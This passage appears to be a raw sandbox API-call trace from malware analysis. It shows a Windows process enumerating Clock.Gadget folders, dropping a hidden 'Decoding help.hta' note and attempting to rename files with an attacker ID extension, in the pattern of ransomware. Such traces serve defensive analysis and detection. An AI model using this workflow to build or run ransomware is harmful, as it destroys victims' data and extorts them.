lpFindFileData=0x2330fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eaffd21, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22eb1137, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="css", cAlternateFileName="")) returned 1 [0061.486] lstrcmpW (lpString1=".", lpString2="css") returned -1 [0061.486] lstrcmpW (lpString1="..", lpString2="css") returned -1 [0061.486] lstrcmpiW (lpString1="windows", lpString2="css") returned 1 [0061.486] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\*.*" [0061.486] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\*.*") returned 67 [0061.486] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\", lpString2="css" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\css") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\css" [0061.486] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\css", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\css\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\css\\*.*" [0061.487] GlobalMemoryStatus (in: lpBuffer=0x2330fd10 | out: lpBuffer=0x2330fd10) [0063.796] CreateThread (lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10a9dfd8, dwCreationFlags=0x0, lpThreadId=0x0) Thread: id = 988 os_tid = 0x9a8 [0060.268] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*", lpFindFileData=0x23d0fd30 | out: lpFindFileData=0x23d0fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x805c807b, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x805c807b, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x24558768 [0060.269] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.269] FindNextFileW (in: hFindFile=0x24558768, lpFindFileData=0x23d0fd30 | out: lpFindFileData=0x23d0fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x805c807b, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x805c807b, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.273] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.273] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.273] FindNextFileW (in: hFindFile=0x24558768, lpFindFileData=0x23d0fd30 | out: lpFindFileData=0x23d0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x285ac06b, ftCreationTime.dwHighDateTime=0x1c9ea0e, ftLastAccessTime.dwLowDateTime=0x285ac06b, ftLastAccessTime.dwHighDateTime=0x1c9ea0e, ftLastWriteTime.dwLowDateTime=0x285d21c9, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x6530, dwReserved0=0x0, dwReserved1=0x0, cFileName="cronometer.png", cAlternateFileName="")) returned 1 [0060.273] lstrcpyW (in: lpString1=0x24a16038, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*" [0060.274] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*") returned 68 [0060.274] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\Decoding help.hta" [0060.274] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\decoding help.hta")) returned 0xffffffff [0060.274] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xd3c [0061.494] WriteFile (in: hFile=0xd3c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x23d0fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x23d0fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.494] CloseHandle (hObject=0xd3c) returned 1 [0061.494] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0061.495] lstrcmpiW (lpString1="Decoding help.hta", lpString2="cronometer.png") returned 1 [0061.495] lstrlenW (lpString="cronometer.png") returned 14 [0061.495] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*" [0061.495] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*") returned 68 [0061.495] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\", lpString2="cronometer.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer.png" [0061.495] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer.png" [0061.495] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer.png.[ID]g9uZrLhJaygpwRm1[ID]" [0061.495] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\cronometer.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\cronometer.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0061.495] FindNextFileW (in: hFindFile=0x24558768, lpFindFileData=0x23d0fd30 | out: lpFindFileData=0x23d0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x828d4d58, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x828d4d58, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x285d21c9, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x132, dwReserved0=0x0, dwReserved1=0x0, cFileName="cronometer_dot.png", cAlternateFileName="")) returned 1 [0061.495] lstrcpyW (in: lpString1=0x10fe7630, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*" [0061.495] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*") returned 68 [0061.495] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\Decoding help.hta" [0061.495] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\decoding help.hta")) returned 0x1 [0061.495] lstrcmpiW (lpString1="Decoding help.hta", lpString2="cronometer_dot.png") returned 1 [0061.495] lstrlenW (lpString="cronometer_dot.png") returned 18 [0061.496] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*" [0061.496] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*") returned 68 [0061.496] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\", lpString2="cronometer_dot.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_dot.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_dot.png" [0061.496] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_dot.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_dot.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_dot.png" [0061.496] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_dot.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_dot.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_dot.png.[ID]g9uZrLhJaygpwRm1[ID]" [0061.496] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_dot.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\cronometer_dot.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_dot.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\cronometer_dot.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0061.496] FindNextFileW (in: hFindFile=0x24558768, lpFindFileData=0x23d0fd30 | out: lpFindFileData=0x23d0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82888a9e, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82888a9e, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x285d21c9, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x17d, dwReserved0=0x0, dwReserved1=0x0, cFileName="cronometer_h.png", cAlternateFileName="")) returned 1 [0061.496] lstrcpyW (in: lpString1=0x10fe7630, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*" [0061.496] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*") returned 68 [0061.496] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\Decoding help.hta" [0061.496] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\decoding help.hta")) returned 0x1 [0061.496] lstrcmpiW (lpString1="Decoding help.hta", lpString2="cronometer_h.png") returned 1 [0061.496] lstrlenW (lpString="cronometer_h.png") returned 16 [0061.496] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*" [0061.496] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*") returned 68 [0061.496] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\", lpString2="cronometer_h.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_h.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_h.png" [0061.496] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_h.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_h.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_h.png" [0061.496] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_h.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_h.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_h.png.[ID]g9uZrLhJaygpwRm1[ID]" [0061.496] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_h.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\cronometer_h.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_h.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\cronometer_h.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0061.496] FindNextFileW (in: hFindFile=0x24558768, lpFindFileData=0x23d0fd30 | out: lpFindFileData=0x23d0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x828aebfb, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x828aebfb, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x285f8327, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x1b2, dwReserved0=0x0, dwReserved1=0x0, cFileName="cronometer_m.png", cAlternateFileName="")) returned 1 [0061.497] lstrcpyW (in: lpString1=0x10fe7630, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*" [0061.497] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*") returned 68 [0061.497] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\Decoding help.hta" [0061.497] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\decoding help.hta")) returned 0x1 [0061.497] lstrcmpiW (lpString1="Decoding help.hta", lpString2="cronometer_m.png") returned 1 [0061.497] lstrlenW (lpString="cronometer_m.png") returned 16 [0061.497] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*" [0061.497] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*") returned 68 [0061.497] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\", lpString2="cronometer_m.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_m.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_m.png" [0061.497] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_m.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_m.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_m.png" [0061.497] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_m.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_m.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_m.png.[ID]g9uZrLhJaygpwRm1[ID]" [0061.497] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_m.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\cronometer_m.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_m.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\cronometer_m.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0061.497] FindNextFileW (in: hFindFile=0x24558768, lpFindFileData=0x23d0fd30 | out: lpFindFileData=0x23d0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x828d4d58, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x828d4d58, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x285f8327, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xc63, dwReserved0=0x0, dwReserved1=0x0, cFileName="cronometer_s.png", cAlternateFileName="")) returned 1 [0061.497] lstrcpyW (in: lpString1=0x10fe7630, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*" [0061.497] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*") returned 68 [0061.497] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\Decoding help.hta" [0061.497] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\decoding help.hta")) returned 0x1 [0061.497] lstrcmpiW (lpString1="Decoding help.hta", lpString2="cronometer_s.png") returned 1 [0061.497] lstrlenW (lpString="cronometer_s.png") returned 16 [0061.497] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*" [0061.498] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*") returned 68 [0061.498] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\", lpString2="cronometer_s.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_s.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_s.png" [0061.498] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_s.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_s.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_s.png" [0061.498] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_s.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_s.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_s.png.[ID]g9uZrLhJaygpwRm1[ID]" [0061.498] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_s.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\cronometer_s.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_s.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\cronometer_s.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0061.498] FindNextFileW (in: hFindFile=0x24558768, lpFindFileData=0x23d0fd30 | out: lpFindFileData=0x23d0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x828d4d58, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x828d4d58, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x2861e485, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x7454, dwReserved0=0x0, dwReserved1=0x0, cFileName="cronometer_settings.png", cAlternateFileName="")) returned 1 [0061.498] lstrcpyW (in: lpString1=0x10fe7630, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*" [0061.498] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*") returned 68 [0061.498] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\Decoding help.hta" [0061.498] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\decoding help.hta")) returned 0x1 [0061.498] lstrcmpiW (lpString1="Decoding help.hta", lpString2="cronometer_settings.png") returned 1 [0061.498] lstrlenW (lpString="cronometer_settings.png") returned 23 [0061.498] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*" [0061.498] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*") returned 68 [0061.498] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows 